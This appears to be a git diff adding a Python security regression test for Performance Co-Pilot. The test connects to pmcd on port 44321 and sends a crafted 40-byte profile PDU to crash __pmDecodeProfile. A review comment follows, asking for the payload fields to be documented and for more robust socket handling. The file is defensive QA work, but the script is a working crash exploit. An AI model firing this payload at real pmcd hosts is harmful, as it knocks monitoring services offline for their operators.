Diffstat (limited to 'qa/secure/crash-profile-instances')
-rwxr-xr-xqa/secure/crash-profile-instances22
1 files changed, 22 insertions, 0 deletions
diff --git a/qa/secure/crash-profile-instances b/qa/secure/crash-profile-instances
new file mode 100755
index 0000000..58a989e
--- /dev/null
+++ b/qa/secure/crash-profile-instances
@@ -0,0 +1,22 @@
+#
+# usage: python crash-profile-instances HOST
+#
+# Connects to pmcd on HOST and triggers a crash in __pmDecodeProfile.
+#
+# Florian Weimer / Red Hat Product Security Team
+#
+import socket
+import sys
+import pcppdu
+_, host = sys.argv
+sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+sock.connect((host, 44321))
+pcppdu.client_handshake(sock, from_=1)
+pcppdu.send_pmns_names(sock, from_=1, names=(str("hinv.ncpu"),))
+ids = pcppdu.parse_pmns_ids(pcppdu.read_pdu(sock))
+pmid = ids[1].idlist[0]
+pcppdu.send_desc_req(sock, from_=1, pmid=pmid)
+# print(pcppdu.parse_desc(pcppdu.read_pdu(sock)))
+sock.send(str('\x00\x00\x00(\x00\x00p\x02\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'))
+
+sock.close()
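Review bot: The 40-byte literal passed to `sock.send` is the whole point of this test, yet nothing records which field of the profile PDU is malformed, so a later reader cannot tell what `__pmDecodeProfile` is expected to reject or whether a decoder change still covers the case. A short comment above that line that breaks the literal into its header words and names the out-of-range field would fix that; the leading `\x00\x00\x00(` looks like a length word of 40, which matches the literal's size, but the remaining fields should be labelled by someone with the PDU layout at hand. Separately, `send` may write only part of the buffer and `str(...)` does not produce bytes on Python 3, so `sock.sendall(...)` with a `b'...'` literal would be more robust. The script closes the socket without reading a reply and sets no timeout, so it presumably relies on the surrounding QA harness to confirm that pmcd is still running afterwards; a `sock.settimeout(...)` call before `connect` would keep an unresponsive pmcd from hanging the run.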